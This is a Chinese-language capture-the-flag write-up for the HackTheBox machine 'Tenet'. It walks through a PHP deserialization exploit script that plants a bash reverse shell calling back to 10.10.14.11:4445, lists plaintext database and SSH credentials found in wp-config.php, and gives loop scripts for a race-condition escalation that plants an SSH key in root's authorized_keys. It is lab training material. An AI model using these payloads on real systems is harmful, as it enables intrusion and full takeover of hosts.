Tenet - HackTheBox

基本信息

• https://www.hackthebox.eu/home/machines/profile/309

• 10.10.10.223

端口扫描

常规22和80:

$ nmap -sC -sV 10.10.10.223
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-18 10:48 CST
Nmap scan report for 10.10.10.223
Host is up (0.074s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 (RSA)
|   256 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 (ECDSA)
|_  256 e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.02 seconds

80

直接ip访问是apache默认页面，把tenet.htb加hosts：

是一个wordpress，在一个评论里提示sator php backup，这是子域名，同样加hosts：

10.10.10.223 tenet.htb sator.tenet.htb

##sator.tenet.htb

直接访问是apache默认页面，根据前面的提示信息，很容易得到bak文件备份：

php 反序列化

查看sator代码，很明显是php反序列化：

• Exploiting PHP deserialization. Intro to PHP object injection… | by Vickie Li | The Startup | Medium
  https://medium.com/swlh/exploiting-php-deserialization-56d71f03282a
• https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf

exploit

那就是直接利用反序列化写php文件，触发reverse shell：

php exp.php

python3 -c 'import pty;pty.spawn("/bin/bash")'

exp.php

<?php
class DatabaseExport
{
        public $user_file = 'test.php';
        public $data = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/10.10.14.11/4445 0>&1\'"); ?>';

        public function __destruct()
        {
                file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
                echo '[] Database updated';
        }
}

$url = 'http://10.10.10.223/sator.php?arepo=' . urlencode(serialize(new DatabaseExport));
$response = file_get_contents("$url");
$response = file_get_contents("http://10.10.10.223/test.php");

?>

信息搜集

然后就在wordpress/wp-config.php里得到mysql用户名密码：

/** MySQL database username */
define( 'DB_USER', 'neil' );

/** MySQL database password */
define( 'DB_PASSWORD', 'Opera2112' );

这也就直接是ssh用户名密码

user flag

直接ssh登录，读取user.txt:

提权信息

sudo -l可以看到当前用户可以sudo运行/usr/local/bin/enableSSH.sh：

查看这个文件，里面addkey就是把/tmp/ssh-XXXXXXXX复制写入到/root/.ssh/authorized_keys，那么可以考虑做条件竞争，把我们自己的公钥写到/tmp/ssh-XXXXXXXX，从而使其复制写入到/root/.ssh/authorized_keys：

条件竞争 && root flag

就是两个脚本，一个写入公钥到tmp，一个sudo调用enableSSH.sh，竞争成功即可root登录，得到root.txt：

add_rsa.sh

while true
do
echo "ssh-rsa key" | tee /tmp/ssh-*
done

1.sh

while true
do
sudo /usr/local/bin/enableSSH.sh
done

参考资料

• Exploiting PHP deserialization. Intro to PHP object injection… | by Vickie Li | The Startup | Medium
  https://medium.com/swlh/exploiting-php-deserialization-56d71f03282a
• https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf
• Tenet Writeup FREE | RaidForums
  https://raidforums.com/Thread-Free-Flag-Tenet-Writeup-FREE